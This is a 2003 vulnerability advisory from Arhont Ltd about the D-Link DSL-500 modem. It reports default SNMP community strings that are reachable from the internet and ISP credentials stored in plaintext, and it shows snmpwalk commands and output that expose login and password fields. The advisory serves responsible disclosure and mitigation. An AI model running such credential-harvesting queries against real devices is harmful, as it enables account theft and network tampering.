Arhont Ltd - Information Security Company Arhont Advisory by: Andrei Mikhailovsky (www.arhont.com) Advisory: D-Link DSL Broadband Modem/Router Router Model Name: D-Link DSL-500 Model Specific: Other models might be vulnerable as well Manufacturer site: http://www.dlink.com Manufacturer contact (UK): Tel: 0800 9175063 / 0845 0800288 Contact Date: 06/03/2003 DETAILS: While performing a general security testing of a network, we have found several security vulnerability issues with the D-Link DSL Broadband Modem DSL-500 Issue 1: The default router installation enables SNMP (Simple Network Management Protocol) server with default community names for read and read/write access. The DSL-500 modem is configured alow SNMP access from the WAN (Wide Area Network)/Internet side as well as from LAN. andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1 sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30 Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk Copyright (c) 2000 Dlink Corp. sysObjectID.0 = OID: enterprises.171.10.30.1 sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47 ... ... The community name: public allows read access to the mentioned devices, allowing enumeration and gathering of sensitive network information. The community name: private allows read/write access to devices, thus allowing change of the network settings of the broadband modem. Impact: This vulnerability allows local and internet malicious attackers to retrieve and change network settings of the modem. Risk Factor: Medium/High Possible Solutions: Firewall UDP port 161 from LAN/WAN sides, as it is not possible to disable SNMP service from the web management interface. Issue 2: The ISP account information including login name and password is stored on the modem without encryption, It is therefore possible to retrieve this information with simple SNMP gathering utility such as snmpwalk: andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1 sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30 Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk ... ... ... transmission.23.2.3.1.5.2.1 = STRING: "username@dsl-provider" ... ... transmission.23.2.3.1.6.2.1 = STRING: "password-string" ... ... ... Impact: This vulnerability allows LAN and internet malicious attackers to retrieve confidential information. Risk Factor: Very High Possible Solutions: As a temporary solution you should firewall UDP port 161 from LAN/WAN sides, as it is not possible to disable SNMP service from the web management interface. According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer 7 days before releasing them to the public domains (such as CERT and BUGTRAQ), unless specifically requested by the manufacturer. If you would like to get more information about this issue, please do not hesitate to contact Arhont team at infosec@arhont.com. Kind Regards, Andrei Mikhailovsky Arhont Ltd http://www.arhont.com GnuPG Keyserver: blackhole.pca.dfn.de GnuPG Key: 0xFF67A4F4
